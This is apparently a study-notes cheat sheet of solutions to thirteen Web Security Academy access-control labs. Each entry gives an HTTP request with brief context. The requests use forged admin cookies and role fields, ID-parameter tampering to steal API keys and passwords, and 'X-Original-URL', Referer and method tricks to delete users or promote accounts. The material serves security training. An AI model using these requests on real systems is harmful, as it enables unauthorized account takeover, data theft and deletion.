##### Unprotected admin functionality – delete `carlos` via hidden admin endpoint ```http GET /administrator-panel/delete?username=carlos HTTP/1.1 Host: YOUR-LAB-ID.web-security-academy.net ``` Context: The `/administrator-panel` interface is exposed without any authentication or authorization checks. After discovering it via `robots.txt`, simply issuing a request to the delete endpoint removes the user `carlos`. Encoding: None Source: [[1. Unprotected admin functionality]] --- ##### Unprotected admin functionality with unpredictable URL – endpoint discovered via application JavaScript ```http GET /<admin-path-from-js>/delete?username=carlos HTTP/1.1 Host: YOUR-LAB-ID.web-security-academy.net ``` Context: The admin panel URL is exposed client-side in the site's JavaScript source. No authentication or authorization is enforced on this hidden endpoint, allowing direct user deletion. Encoding: None Source: [[2. Unprotected admin functionality with unpredictable URL]] --- ##### User role controlled by request parameter – forge `Admin` cookie to delete `carlos` ```http GET /admin/delete?username=carlos HTTP/1.1 Host: YOUR-LAB-ID.web-security-academy.net Cookie: session=YOUR_SESSION_ID; Admin=true ``` Context: The application determines admin privileges purely from the `Admin` cookie value. By intercepting the login response, changing `Admin=false` to `Admin=true`, and then requesting the delete endpoint, you can remove user `carlos`. Encoding: None Source: [[3. User role controlled by request parameter]] --- ##### User role modification via profile update – forge `roleid` to gain admin and delete `carlos` ```http POST /my-account HTTP/1.1 Host: YOUR-LAB-ID.web-security-academy.net Content-Type: application/json Cookie: session=YOUR_SESSION_COOKIE {"email":"[email protected]","roleid":2} ``` Context: The profile update endpoint accepts a JSON body including `roleid`. By adding `"roleid":2`, you elevate your privileges to admin. Encoding: None Source: [[4. User role can be modified in user profile]] --- ##### User ID controlled by request parameter – horizontal privilege escalation ```http GET /my-account?id=carlos HTTP/1.1 Host: YOUR-LAB-ID.web-security-academy.net Cookie: session=YOUR_SESSION_COOKIE ``` Context: The `id` parameter in the `/my-account` endpoint determines which user’s details are shown, without any authorization check. By changing `id` from your own username to `carlos`, you retrieve his API key. Encoding: None Source: [[5. User ID controlled by request parameter]] ##### User ID controlled by request parameter – horizontal privilege escalation via GUID ```http GET /my-account?id=GUID-OF-CARLOS HTTP/1.1 Host: YOUR-LAB-ID.web-security-academy.net Cookie: session=YOUR_SESSION_COOKIE ``` Context: The `id` parameter on the account page is used to fetch user details without any authorization check. By substituting your own GUID with Carlos’s GUID—discovered from one of his blog-post URLs—you can view his account and retrieve his API key. Encoding: None Source: [[6. User ID controlled by request parameter, with unpredictable user IDs]] --- ##### User ID controlled by request parameter with data leakage in redirect – leak API key in redirect response ```http GET /my-account?id=carlos HTTP/1.1 Host: YOUR-LAB-ID.web-security-academy.net Cookie: session=YOUR_SESSION_COOKIE ``` Context: The `id` parameter on `/my-account` is not access-controlled. When set to `carlos`, the server redirects you (3xx) but includes Carlos’s API key in the **response body** of the redirect. Encoding: None Source: [[7. User ID controlled by request parameter with data leakage in redirect]] --- ##### Admin password disclosure via user ID manipulation ```http GET /my-account?id=administrator HTTP/1.1 Host: YOUR-LAB-ID.web-security-academy.net Cookie: session=YOUR_SESSION_COOKIE ``` Context: The `/my-account` page pre-fills the password field with the current user’s actual password. By changing the `id` parameter to `administrator`, you retrieve the admin’s password from the HTML response. Encoding: None Source: [[8. User ID controlled by request parameter with password disclosure]] --- ##### Insecure direct object references – retrieve chat transcript to steal password ```http GET /transcript?filename=1.txt HTTP/1.1 Host: YOUR-LAB-ID.web-security-academy.net Cookie: session=YOUR_SESSION_COOKIE ``` Context: Chat transcripts are stored as static text files with predictable, incrementing filenames. By changing the `filename` parameter to `1.txt`, you access Carlos’s transcript, which contains his password. Encoding: None Source: [[9. Insecure direct object references]] --- ##### URL-based access control bypass via `X-Original-URL` – delete `carlos` ```http GET /?username=carlos HTTP/1.1 Host: YOUR-LAB-ID.web-security-academy.net X-Original-URL: /admin/delete ``` Context: A front-end proxy blocks direct access to `/admin`, but the backend framework honors the `X-Original-URL` header. By setting the real request to `/` with `?username=carlos` and overriding the path to `/admin/delete`, the `carlos` user is removed. Encoding: None Source: [[10. URL-based access control can be circumvented]] --- ##### Method-based access control bypass via GET ```http GET /admin-roles?username=wiener&action=promote HTTP/1.1 Host: YOUR-LAB-ID.web-security-academy.net Cookie: session=YOUR_SESSION_COOKIE ``` Context: The `/admin-roles` endpoint enforces authorization only on `POST` requests. By switching to a `GET` request, the server processes the same action without checking your admin privileges, allowing you to elevate `wiener` to administrator. Encoding: None Source: [[11. Method-based access control can be circumvented]] ---- ##### Broken multi-step process – bypass missing auth on confirm step ```http POST /admin-roles/confirm HTTP/1.1 Host: YOUR-LAB-ID.web-security-academy.net Content-Type: application/x-www-form-urlencoded Cookie: session=NON-ADMIN-SESSION username=wiener&action=promote ``` Context: The first promotion step enforces admin-only checks, but the **confirmation endpoint** (`/admin-roles/confirm`) does **not** revalidate privileges. By replaying the saved request with a non-admin session cookie and your own username, you complete the promotion. Encoding: None Source: [[12. Multi-step process with no access control on one step]] --- ##### Referer-based access control bypass – promote user via spoofed `Referer` ```http GET /admin-roles?username=wiener&action=upgrade HTTP/1.1 Host: YOUR-LAB-ID.web-security-academy.net Referer: https://YOUR-LAB-ID.web-security-academy.net/admin Cookie: session=YOUR_LOW_PRIVILEGE_SESSION ``` Context: The `/admin-roles` endpoint authorizes admin actions solely by checking that the `Referer` header contains `/admin`. By replaying the request with a non-admin session and spoofing `Referer: https://…/admin`, you bypass the flawed check and successfully upgrade `wiener` to administrator. Encoding: None Source: [[13. Referer-based access control]]